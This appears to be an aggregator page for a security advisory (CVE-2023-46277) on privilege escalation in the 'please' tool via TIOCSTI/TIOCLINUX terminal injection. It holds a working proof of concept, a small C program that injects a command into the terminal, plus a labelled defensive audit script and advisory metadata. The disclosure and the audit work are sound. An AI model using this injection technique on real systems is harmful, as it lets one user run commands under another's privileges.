Ecosyste.ms: Advisories
Pleaser privilege escalation vulnerability
please (aka pleaser) through 0.5.4 allows privilege escalation through the TIOCSTI and/or TIOCLINUX ioctl. (If both TIOCSTI and TIOCLINUX are disabled, this cannot be exploited.)
Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
    const char *text = "id\n";
    while (*text)
        ioctl(0, TIOCSTI, text++);
    return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
This affects both the case where root wants to drop privileges and the case where a non-root user wants to gain other privileges.
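A defender-side audit check for this advisory, added here as an example (it is not part of the advisory or of the please project). It assumes the caller supplies the installed pleaser version, that a setuid binary would live in one of a constructed list of standard directories, and that the host runs Linux; the dev.tty.legacy_tiocsti sysctl (Linux 6.2 and later) covers only the TIOCSTI path, not TIOCLINUX.

```shell
# Audit helper for GHSA-cgf8-h3fp-h956 / CVE-2023-46277 (constructed example,
# not the please project's code). With no fixed version, the actionable checks
# are: is an affected, setuid pleaser installed, and does the kernel honour TIOCSTI?
AFFECTED_MAX=0.5.4   # advisory: Affected Version Ranges: <= 0.5.4

# version_le A B: 0 when dotted numeric version A <= B (up to three digit-only parts).
version_le() {
    a=$(printf '%s' "$1" | tr . ' ')
    b=$(printf '%s' "$2" | tr . ' ')
    set -- $a; a1=${1:-0}; a2=${2:-0}; a3=${3:-0}
    set -- $b; b1=${1:-0}; b2=${2:-0}; b3=${3:-0}
    if [ "$a1" -ne "$b1" ]; then [ "$a1" -lt "$b1" ] && return 0; return 1; fi
    if [ "$a2" -ne "$b2" ]; then [ "$a2" -lt "$b2" ] && return 0; return 1; fi
    [ "$a3" -le "$b3" ]
}

# 0 when the given pleaser version falls inside the advisory's affected range.
pleaser_version_affected() {
    version_le "$1" "$AFFECTED_MAX"
}

# Linux 6.2+ exposes dev.tty.legacy_tiocsti; "0" means the kernel refuses TIOCSTI
# for everyone, which closes the TIOCSTI path of this advisory (TIOCLINUX on
# virtual consoles is a separate path). Older kernels have no knob: report
# "unknown" and treat TIOCSTI as available.
legacy_tiocsti_state() {
    f=/proc/sys/dev/tty/legacy_tiocsti
    if [ -r "$f" ]; then cat "$f"; else echo unknown; fi
}

# Setuid binaries named "please" in a constructed list of install directories;
# the reproduction above depends on the u+s bit, so a non-setuid copy is not reachable.
setuid_please_binaries() {
    for d in /usr/bin /usr/local/bin /usr/sbin /usr/local/sbin; do
        [ -u "$d/please" ] && echo "$d/please"
    done
    return 0
}

# audit_pleaser VERSION: VERSION is the installed pleaser version as reported by
# your package manager (assumed input; this script does not parse it itself).
audit_pleaser() {
    if pleaser_version_affected "$1"; then
        echo "pleaser $1: affected (<= $AFFECTED_MAX, no fixed version)"
    else
        echo "pleaser $1: outside the affected range"
    fi
    echo "dev.tty.legacy_tiocsti: $(legacy_tiocsti_state)"
    echo "setuid please binaries:"; setuid_please_binaries
}

if [ $# -gt 0 ]; then audit_pleaser "$1"; fi
```

Run it as `sh audit_pleaser.sh 0.5.4` on the host being checked; a "0" for dev.tty.legacy_tiocsti on a kernel that has the knob means the TIOCSTI half of the advisory is already closed kernel-wide.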
Permalink: https://github.com/advisories/GHSA-cgf8-h3fp-h956
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jZ2Y4LWgzZnAtaDk1Ns4AA2lB
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: 3 months ago
CVSS Score: 7.8
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.00042
EPSS Percentile: 0.05089
Identifiers: GHSA-cgf8-h3fp-h956, CVE-2023-46277
References:
- https://nvd.nist.gov/vuln/detail/CVE-2023-46277
- https://github.com/rustsec/advisory-db/pull/1798
- https://gitlab.com/edneville/please/-/issues/13
- https://gitlab.com/edneville/please/-/merge_requests/69#note_1594254575
- https://rustsec.org/advisories/RUSTSEC-2023-0066.html
- https://github.com/advisories/GHSA-cgf8-h3fp-h956
Blast Radius: 1.0
Affected Packages
cargo:pleaser
Dependent packages: 0
Dependent repositories: 0
Downloads: 30,348 total
Affected Version Ranges: <= 0.5.4
No known fixed version
All affected versions: 0.1.0, 0.2.0, 0.3.0, 0.3.1, 0.3.3, 0.3.4, 0.3.5, 0.3.7, 0.3.8, 0.3.9, 0.3.10, 0.3.11, 0.3.12, 0.3.15, 0.3.16, 0.3.17, 0.3.18, 0.3.19, 0.3.20, 0.3.21, 0.3.22, 0.3.24, 0.3.25, 0.4.0, 0.4.1, 0.4.2, 0.5.0, 0.5.1, 0.5.2, 0.5.3, 0.5.4